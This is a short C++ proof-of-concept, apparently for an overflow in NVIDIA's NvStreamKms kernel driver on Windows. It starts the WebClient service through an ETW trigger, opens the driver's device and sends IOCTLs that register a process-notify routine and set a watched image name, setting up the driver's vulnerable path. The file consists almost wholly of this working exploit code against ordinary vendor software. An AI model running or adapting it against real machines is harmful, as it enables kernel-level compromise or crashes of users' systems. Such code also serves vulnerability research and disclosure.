// nvstreamkms_overflow.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"

#include <windows.h>
#include <Evntprov.h>

// code stolen from forshaw@
bool StartWebClientService()
{
	const GUID _MS_Windows_WebClntLookupServiceTrigger_Provider =
	{ 0x22B6D684, 0xFA63, 0x4578,
	{ 0x87, 0xC9, 0xEF, 0xFC, 0xBE, 0x66, 0x43, 0xC7 } };
	REGHANDLE Handle;
	bool success = false;

	if (EventRegister(&_MS_Windows_WebClntLookupServiceTrigger_Provider,
		nullptr, nullptr, &Handle) == ERROR_SUCCESS) {
		EVENT_DESCRIPTOR desc;

		EventDescCreate(&desc, 1, 0, 0, 4, 0, 0, 0);
		success = EventWrite(Handle, &desc, 0, nullptr) == ERROR_SUCCESS;
		EventUnregister(Handle);
	}

	return success;
}

int main() {
	if (!StartWebClientService()) {
		fprintf(stderr, "failed to start WebClient.\n");
	}

	HANDLE device = CreateFileW(
		L"\\\\.\\NvStreamKms",
		GENERIC_READ | GENERIC_WRITE,
		FILE_SHARE_READ | FILE_SHARE_WRITE,
		nullptr,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		nullptr);
	
	if (device == INVALID_HANDLE_VALUE) {
		fprintf(stderr, "Failed to open NvStreamKms\n");
		return 1;
	}

	struct Input {
		DWORD pid;
		DWORD arg;
	} input;

	input.pid = GetCurrentProcessId();
	input.arg = 1;

	// Make NvStreamKms call PsSetCreateProcessNotifyRoutine
	if (!DeviceIoControl(device, 0x220004, &input, 8, nullptr, 0, nullptr, nullptr)) {
		fprintf(stderr, "initial ioctl failed\n");
		return 1;
	}

	// Set an image name to watch for.
	wchar_t image_name[260] = L"blahblah";
	if (!DeviceIoControl(device, 0x22001c, image_name, 520, nullptr, 0, nullptr, nullptr)) {
		fprintf(stderr, "set image name ioctl failed\n");
		return 1;
	}

	Sleep(999999);
	return 0;
}
